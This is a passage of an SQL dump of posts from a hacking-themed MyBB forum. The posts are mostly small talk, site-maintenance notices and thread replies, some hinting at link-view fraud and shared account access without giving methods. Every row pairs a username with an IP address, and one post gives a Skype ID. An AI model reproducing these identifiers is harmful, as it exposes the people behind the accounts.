`fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7478', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1352625007', 'I dont think it works for adf.ly. Ill test it right away.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0ac68d83bc8c7a36d4cba739d20e0bed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7479', '1144', '6706', '11', 'RE: What can you do with?', '0', '53', 'sirchamp', '1352625357', 'Well you need to have open port(s).', '180.98.213.253', '-1268591107', '1', '0', '0', '0', '1', 'ac328e100b69967dc72a568bc30d5ceb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7480', '1248', '7407', '3', 'RE: Recent Updates', '0', '205', 'mothered', '1352633870', 'I\'ve read the lot, and must say, they\'re pretty good. Good to see that the ranking has Improved too.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9c8b47b484b9438bce73ee79c99ddf2a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7481', '1253', '0', '7', 'Who\'s had a Toothache?', '0', '205', 'mothered', '1352634279', 'Greetings LH, So who\'s had a serious toothache, and what were your experiences? And I mean a pretty bad one. I chipped my back tooth today, and It was bloody killing me. A few pain killers have settled It, but no doubt, It\'ll flare up again. Off to the dentist tomorrow.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'b5195436ae0f06984fcbaab43ea12d83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7482', '1254', '0', '65', 'Who\'s watched The Social Network movie?', '0', '205', 'mothered', '1352634721', 'Greetz everyone, Although the movie was released In 2010, I never got around to watch The Social Network movie. It\'s playing now In my locality, and I\'m burning It to disc, to watch at a later time. Just want to know whether It\'s worth my while.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ee0b8f0308bcf92e583096e0e5495d31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7483', '1234', '7299', '46', 'RE: Did someone ever hack you through phishing?', '0', '205', 'mothered', '1352635342', 'Hasn\'t happened yet, and I certainly wish It never does.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '38b30bc3c5e864b676e81f2d656821c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7484', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '228', 'VirtualLegend', '1352642227', 'It\'s a good movie, You should watch it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'aae25272c69f936f22c3e08f6514a4b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7485', '1247', '7398', '4', 'RE: Hey Everybody!', '0', '228', 'VirtualLegend', '1352642292', 'Welcome To LH, be sure to stay active and HQ', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'cc0a130c8816afba7fb02a96da3da10c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7486', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '82', 'iTzIpod', '1352647970', 'Thanks for your feedback. Hoping I can get more opinions.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7edd19bf53bc0346adc98d2edcf64c29', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7487', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352648005', 'No you didn\'t, I won.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e34c970152e810dc5b7020d49fb46a03', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7488', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352648045', 'Banned for not having a period.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '901eb59982e89565176074195d767049', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7489', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352648083', 'Sirchamp, have you ever got paid from Adfoc.us from this method?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9d6bdf4bc216db0b823a910f18142200', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7490', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '82', 'iTzIpod', '1352648207', 'I\'ve had a lot of toothaches. It hurt really bad and parts of my teeth are already chipped off by a little. Sometimes, the teeth in the very back of my mouth hurt really bad when I eat and then parts of that back tooth come out of my gums. So then, I just pull it out. :/ Hurts really bad.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '75a81bd97338989ce0fd00b60a809d5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7491', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '228', 'VirtualLegend', '1352648554', 'Really Bad idea, I don\'t know about you guys, but if I\'m on online i don\'t want to wait to post', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'b3655e2b9eb7e65675f67ba11385c261', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7492', '1040', '5986', '61', 'RE: How To Get Passes To Porn Sites', '0', '228', 'VirtualLegend', '1352648872', 'lmao, gonna check it out Does it still work', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '4135503f3c635a430c4d10a89a2288f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7493', '1252', '7463', '49', 'RE: [Suggestion] Post cooldown', '0', '53', 'sirchamp', '1352649992', 'I dont think this is necessary. If you make more than one post in 30 seconds I doubt that it is a good and usefull post. These addition would bring more spam posts.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8414cf701f80cd9155cf95b7227351e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7494', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '53', 'sirchamp', '1352651747', 'The last 2 months, not many people were using the method then. But now its overused so I dont think anyone will get paid out.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '92353df76a8e34a6820bcd6596a47d96', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7495', '1255', '0', '4', 'Wasssup?', '0', '345', 'ZetaHunter', '1352654955', '[size=medium]Hu Guys new to here[/size]', '116.203.56.36', '1959475236', '0', '0', '0', '0', '1', '251ce814ed671ddba70b8ea1c5ed455f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7496', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '228', 'VirtualLegend', '1352655344', 'Never ever had it before, :bigsmile:', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'fbd919fa70f74940759410bf45fa2c1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7497', '1255', '7495', '4', 'RE: Wasssup?', '0', '228', 'VirtualLegend', '1352655468', 'Welcome ZetaHunter to LH, Be sure to check out the rules; http://l33thacking.net/misc.php?action=help&hid=8 If you have questions or if you need help just PM me Have a Nice Stay', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '837b27bceab15377ac86f04b7c418d21', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7498', '1248', '7476', '3', 'RE: Recent Updates', '0', '1', 't3h jok3r', '1352661310', '[quote=\'R?????zo?\' pid=\'7476\' dateline=\'1352620787\'] Where\'s the market place? Can\'t find it. [/quote] It\'s going to be added soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b0ed3e4cdcc017a6f94c42dd6e774a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7499', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352661608', 'We had a outdated plugin which I updated. Can someone check and tell if it the issue is resolved or not?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd7c285603ba5fd0a7b28cdef47d2f037', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7500', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352661967', 'I think it\'s working good now. :) Thanks t3h jok3r. You can close the thread for now, if any member receives the issue again, they can make a thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bfcb568d2b113274232e2618917d26f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7501', '1255', '7495', '4', 'RE: Wasssup?', '0', '82', 'iTzIpod', '1352662013', 'Welcome ZetaHunter! :) This is L33tHacking. Enjoy your stay. Add me on Skype if you want. Skype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c5da0aee813563a16c5b6a7c6921ddb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7502', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662062', 'Thanks for confirming Ipod, lets just wait for one more confirmation then this thread will be closed.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '646bb928761ad1f8255fa1e55a26b5e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7503', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352662075', 'Oh so that explains why Adfoc.us is taking so long to pay.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b7621dc2ed63d60d4732f768a939fb8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7504', '1248', '7407', '3', 'RE: Recent Updates', '0', '82', 'iTzIpod', '1352662110', 'I see you updated the thread informing us about the Cloud Flare issues. It\'s not fixed yet.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0d75fe5bd0350ae46b9b5230b852ffae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7505', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '82', 'iTzIpod', '1352662182', 'Wait no, I just received one after posting in a different thread. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fb98571ea0f3eb14e156164d19faf489', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7506', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662280', 'Did it use the lock mycode?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7820bcf6eddb786819db75a4903e374a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7507', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '53', 'sirchamp', '1352662339', 'I still have the error.(25)', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '488304533a00e6e6ffe221985a463c1f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7508', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '1', 't3h jok3r', '1352662506', 'I gotta get braces that\'s how bad my teeths are.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a1406b11c81bb1a259f5891a2368700', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7509', '1236', '7317', '3', 'RE: CloudFlare Issues?', '0', '1', 't3h jok3r', '1352662590', 'Can you guys try to clear your history and cache and try again? I\'m not getting the errors anymore which is weird.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '893e792471f2e185b2098dafd69eac9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7510', '1255', '7495', '4', 'RE: Wasssup?', '0', '1', 't3h jok3r', '1352662960', 'Welcome to L33T Hacking. Hope you enjoy your stay. How did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '563519423f01e5af1e0226dfdb530165', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7511', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '53', 'sirchamp', '1352663068', 'I have braces. They are a pain but its worth it. Sometimes the wire detaches itself from the brace and stings my gums...thats sore', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f3851765759b086865e37fa1f441424b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7512', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '228', 'VirtualLegend', '1352665871', 'Yeah My payment is still on requested', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '655b05f752dd7897e9fafed3faf5b66e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7513', '1256', '0', '3', 'Recent Downtime and Forced to change password', '0', '1', 't3h jok3r', '1352761412', 'We were down for around 12 hours recently due to some server issues by my hosting company so that\'s why L33T Hacking was not accessible. I set l33thacking to off for maintenance but unfortunately the site when down the same time. We are backup and I have postponed the updates I was planning to implement. There\'s always another day and I\'ll try to implement those updates before the end of this month. [b]Edited[/b] Congratulations everyone. My L33T Hacking account ONLY was compromised and as we all know HF was hacked once, Ubers was hacked twice and we were hacked once. So basically all the successful hacking communities were hacked once and since he have such a great hater out on the web it means that we becoming famous to gain l33t haters like HF (AWESOME). Unfortunately that l33t haxor was only able to crack my account god knows how because I\'m almost impossible to be DOX\'d without my real email, this site has captcha and has no vulnerabilities. Anyway, there\'s nothing to worry about. Only my account was cracked into, I investigated everything and nothing was changed. Which means no harm was caused. I also found out that the hacker was not able to break into our first level security to access the Admin Control Panel (What a smart hacker *Skid*). There was no harm done so if I wanted I could have kept this private but I thought it was necessary to inform the members also the \"force password change\" was important for me to feel comfortable that you all are safe.', '72.231.24.165', '1223104677', '1', '0', '1', '1352783838', '1', '5279a2ee978db76060b7f2c2ef1b4192', '0', '1352783838'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7514', '1241', '7420', '35', 'RE: New Userbars- Voting', '0', '1', 't3h jok3r', '1352761500', '[quote=\'R?????zo?\' pid=\'7420\' dateline=\'1352587541\'] Keep the current ones pleaaaaase! [/quote] Okkkkkkkkkkkkkkkkkkkk So far it\'s 2 votes for set # 2. One vote for the current and one for set # 1.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c8634baf9884310e4ec9ef125d6958c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7515', '1256', '7513', '3', 'RE: Recent Downtime', '0', '82', 'iTzIpod', '1352762502', 'Can you tell us what the updates were for? Also, thanks for the notice.', '24.212.197.164', '416597412', '1', '0', '82', '1352762547', '1', '56019cbde9474b39b784013028e59e1f', '0', '1352762547'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7516', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '82', 'iTzIpod', '1352762626', 'Thanks for the release! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6bc963e36ab6ec824876ddaeae2f5974', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7517', '1202', '7071', '34', 'RE: ???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '82', 'iTzIpod', '1352762765', 'Very HQ and nice share. In my opinion, should be stickied. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5abaea5eb0f63d8af61e5a86f1f16cbe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7518', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '257', 'XxTREYZxX', '1352765025', 'Cool hope set 1 wins it looks mad as.', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'ec1daec88a2be89780465f1464b8c989', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7519', '1241', '7325', '35', 'RE: New Userbars- Voting', '0', '2', 'Apathy', '1352765262', 'Either 2 or 3.', '173.206.176.158', '-1378963298', '0', '0', '0', '0', '1', '31f0bf28e0e578bb2cd02401eb61ab28', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7520', '1256', '7513', '3', 'RE: Recent Downtime', '0', '2', 'Apathy', '1352765309', 'Aight I was wondering what was up. :P', '173.206.176.158', '-1378963298', '0', '0', '0', '0', '1', '0e5a194dce03226f89fa5def7172dc7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7521', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '2', 'Apathy', '1352765578', 'I liked it. Watch it.', '173.206.176.158', '-1378963298', '0', '0', '0', '0', '1', 'd0f7315b4f87e5a4e189b62d0664be97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7522', '1219', '7180', '44', 'RE: FIFA 13 Receipt', '0', '2', 'Apathy', '1352765645', 'I do not need it but nice share.', '173.206.176.158', '-1378963298', '0', '0', '0', '0', '1', '943f0be64386e609d0d782d2eba88582', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7523', '1256', '7513', '3', 'RE: Recent Downtime', '0', '257', 'XxTREYZxX', '1352766104', 'Ok thanks for the notice.', '203.104.11.4', '-882373884', '1', '0', '0', '0', '1', 'fb034acd847ce105a59e8683f74d3daf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7524', '1256', '7515', '3', 'RE: Recent Downtime', '0', '1', 't3h jok3r', '1352767397', '[quote=\'iTzIpod\' pid=\'7515\' dateline=\'1352762502\'] Can you tell us what the updates were for? Also, thanks for the notice. [/quote] No, it\'s a surprise. I don\'t want to ruin the surprise but it\'s worth it.', '72.231.24.165', '1223104677', '1', '0', '1', '1352788712', '1', '295a89981b93f87dc35823529e8fa5bd', '0', '1352788712'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7525', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '1', 't3h jok3r', '1352767507', 'I didn\'t watch it but I\'ll watch it since it has two good reviews.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ce30a4fe03ba26773e233fd9a412a56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7526', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '257', 'XxTREYZxX', '1352767961', 'i REALLY LIKED THIS MOVIE :p', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '606a1b19b1f6d871afa90e6bbab260ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7527', '1256', '7513', '3', 'RE: Recent Downtime', '0', '82', 'iTzIpod', '1352769350', 'It better be. If it\'s not, you must pay me $50 Paypal. :p Nah I\'m joking. So can you estimate when it\'s gonna be established?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c6365be9ca433132c3034a9e7594f6bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, 